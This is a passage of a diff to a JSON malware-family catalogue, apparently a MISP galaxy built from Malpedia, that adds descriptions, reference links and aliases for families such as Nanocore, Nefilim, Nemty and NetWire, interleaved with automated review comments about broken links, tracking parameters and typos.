"https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/"
],
- "synonyms": [],
+ "synonyms": [
+ "FakeDGA",
+ "WillExec"
+ ],
"type": []
},
"uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2",
"value": "MyloBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge",
+ "https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html"
+ ],
+ "synonyms": [
+ "MaMo434376"
+ ],
+ "type": []
+ },
+ "uuid": "5cb1091c-bfe7-440c-a8c7-b652e205e65b",
+ "value": "MZRevenge"
+ },
{
"description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.",
"meta": {
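Review bot: The second ref in the new MyDogs entry is two URLs fused without a separator (`...part-1.html` runs straight into `https://www.pwc.co.uk/...part-2.html`), so it resolves to neither report, and the part-2 URL already appears as the ref just before it. Keep the part-1 URL on its own, `"https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",`, and drop the fused string. The new AhnLab ref in the MyKings entry of the same hunk carries raw `[` and `]` in its path, which strict URL parsers reject; writing them as `%5B`/`%5D` keeps the link usable. Given the Ref line in the commit message, these values presumably come straight from the Malpedia export, so the correction may belong upstream rather than in this cluster file.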
@@ -12055,6 +22246,27 @@
"uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd",
"value": "Nabucur"
},
+ {
+ "description": "According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b",
+ "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html"
+ ],
+ "synonyms": [
+ "Cyruslish",
+ "TWOPENCE",
+ "VIVACIOUSGIFT"
+ ],
+ "type": []
+ },
+ "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
+ "value": "NACHOCHEESE"
+ },
{
"description": "",
"meta": {
@@ -12073,6 +22285,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
@@ -12083,16 +22296,44 @@
"value": "Naikon"
},
{
- "description": "",
+ "description": "Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
+ "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://goggleheadedhacker.com/blog/post/11",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
"https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/"
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a"
+ ],
+ "synonyms": [
+ "Nancrat",
+ "NanoCore"
],
- "synonyms": [],
"type": []
},
"uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4",
@@ -12129,6 +22370,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims",
"https://www.ncsc.gov.uk/alerts/turla-group-malware"
],
"synonyms": [],
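Review bot: The new Nanocore refs cite the same Medium article twice, once as the plain URL and once with a `?sk=` parameter appended; the second form is a duplicate and the parameter appears to be a per-account sharing key rather than part of the article's identity, so only the plain URL should stay. The Bitdefender ref likewise carries `?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter`, and the same kind of tracking suffix sits on the CrowdStrike sprite-spider ref in the MimiKatz hunk at the top of this chunk (whose header is out of view) and on the Sophos raticate ref in the NetWire hunk further down; stripping such parameters keeps refs stable and makes duplicates across entries easy to spot. The new description also has a typo, `It as been used` → `It has been used`.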
@@ -12142,6 +22385,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/",
"https://blog.talosintelligence.com/2018/05/navrat.html?m=1"
],
"synonyms": [],
@@ -12150,6 +22395,23 @@
"uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872",
"value": "NavRAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
+ "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "85056c54-f8f1-4a98-93cb-322cc1deb52c",
+ "value": "nccTrojan"
+ },
{
"description": "",
"meta": {
@@ -12158,10 +22420,17 @@
"https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
"https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
"http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-riverview",
"https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
"https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
"https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/"
],
@@ -12173,12 +22442,58 @@
"uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
"value": "Necurs"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f061ad00-c215-478e-ae31-77fcdc2f4963",
+ "value": "NedDnLoader"
+ },
+ {
+ "description": "According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
+ "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/"
+ ],
+ "synonyms": [
+ "Nephilim Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "895f088e-a862-462c-a754-6593c6a471da",
+ "value": "Nefilim Ransomware"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim",
- "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf"
+ "https://www.secureworks.com/research/threat-profiles/tungsten-bridge",
+ "http://blog.nsfocus.net/darkhotel-3-0908/"
],
"synonyms": [
"Nemain"
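Review bot: The last sentence of the new Nefilim description is ungrammatical and ambiguous about what protects what: `Uses AES-128, which is then protected RSA2048.` should read `Uses AES-128, which is then protected by RSA-2048.` (or spell out that the AES key is RSA-wrapped, if that is what the cited SentinelOne write-up says). In the Nemim hunk below it, the only ref whose name indicates an indicator appendix (`darkhotelappendixindicators_kl.pdf`) is dropped in favour of two profile pages; if that appendix was the basis for the `Nemain` synonym that remains in the entry, it is worth keeping it alongside the new refs rather than replacing it.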
@@ -12188,6 +22503,67 @@
"uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428",
"value": "Nemim"
},
+ {
+ "description": "Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
+ "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
+ "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
+ "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "465696be-d576-4750-9469-89e19984f3df",
+ "value": "Nemty"
+ },
+ {
+ "description": "Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\" The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta",
+ "https://www.virusradar.com/en/Win32_Neshta.A/description",
+ "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "13d2482d-21fc-4044-891e-a7fb2b1660e9",
+ "value": "neshta"
+ },
+ {
+ "description": "NESTEGG is a memory-only backdoor that can proxy commands to other\r\ninfected systems using a custom routing scheme. It accepts commands to\r\nupload and download files, list and delete files, list and terminate processes, and\r\nstart processes. NESTEGG also creates Windows Firewall rules that allows the\r\nbackdoor to bind to a specified port number to allow for inbound traffic.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://youtu.be/_kzFNQySEMw?t=789",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf",
+ "https://youtu.be/8hJyLkLHH8Q?t=1208",
+ "https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fce1f9a7-bac7-4b11-8ea7-3c72931cd14a",
+ "value": "NESTEGG"
+ },
{
"description": "",
"meta": {
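Review bot: Three of the new descriptions in this hunk need copy-editing before they are presented to analysts: the Nemty text has `artfifacts` for `artifacts`; the Neshta text has a space before each full stop (`virus .`, `Delphi .`, `41,472 bytes .`) and its closing sentence reads as a rough translation, e.g. `This file virus is the type of virus that is no longer popular at present.` → `File infectors of this kind are rarely seen today.`; and the NESTEGG text is a report excerpt that keeps `\r\n` hard wraps mid-sentence where the other new entries in this hunk use single-line prose, so the breaks should become spaces unless the consumer is known to render them. The NESTEGG sentence `creates Windows Firewall rules that allows the backdoor` also needs `allow`.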
@@ -12206,9 +22582,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [
+ "Neteagle_Scout",
"ScoutEagle"
],
"type": []
@@ -12216,6 +22594,32 @@
"uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
"value": "NETEAGLE"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "88b2b4ac-9e46-4bc6-b4f6-bf5ddd70ad31",
+ "value": "NetFlash"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey",
+ "https://twitter.com/kevinperlow/status/1156406115472760835"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b8ec2602-c5e5-4b49-a50e-bb3d9676abc3",
+ "value": "NetKey"
+ },
{
"description": "",
"meta": {
@@ -12234,11 +22638,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat",
- "http://www.netsupportmanager.com/index.asp",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
- "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/"
+ "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
+ "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
+ "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
+ "http://www.netsupportmanager.com/index.asp"
+ ],
+ "synonyms": [
+ "NetSupport"
],
- "synonyms": [],
"type": []
},
"uuid": "42562c47-08e1-46bc-962c-28d1831d092b",
@@ -12249,8 +22658,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler",
+ "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/",
"https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
- "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [
"TravNet"
@@ -12265,14 +22675,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.circl.lu/pub/tr-23/", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://news.drweb.ru/show/?i=13281&c=23", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", + "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" + "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + 
"https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" ], "synonyms": [ + "NetWeird", + "NetWire", "Recam" ], "type": [] @@ -12285,6 +22713,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], 
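Review bot: The Washington Post reference added to the NetWire refs ends in a bare period (`…/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.`), which looks like a truncated URL that lost its file extension; as written it will not resolve and cannot be checked against the claim it is meant to support. Because this file is regenerated from the Malpedia API, the correction belongs upstream or in the import script rather than as a hand edit here, but a known-broken link should not be shipped in the galaxy. Verify the full URL against the Malpedia entry and replace it, or drop the ref until it resolves. The NetWire element's `value` line is outside this hunk, so it cannot be determined from here whether the new `"NetWire"` synonym merely repeats the element's own name.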
@@ -12298,16 +22728,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "http://securitykitten.github.io/an-evening-with-n3utrino/", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" + "http://blog.ptsecurity.com/2019/08/finding-neutrino.html" ], "synonyms": [ "Kasidet" @@ -12322,12 +22754,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", - "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ], - "synonyms": [ - "Jimmy" + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/" ], + "synonyms": [], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", 
@@ -12338,7 +22767,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", + "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6" ], "synonyms": [], "type": [] 
@@ -12346,15 +22781,27 @@ "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass", + "https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1dbbd04-050c-47ce-8164-791f17a4a6b4", + "value": "NewPass" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://asert.arbornetworks.com/lets-talk-about-newposthings/", - "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] @@ -12380,7 +22827,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "CT" 
@@ -12422,13 +22870,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], + "synonyms": [ + "Grobios" + ], + "type": [] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb (Windows)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru", + "https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html" + ], "synonyms": [], "type": [] }, - "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", - "value": "Ngioweb" + "uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25", + "value": "Nibiru" }, { "description": "", @@ -12448,7 +22912,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", - 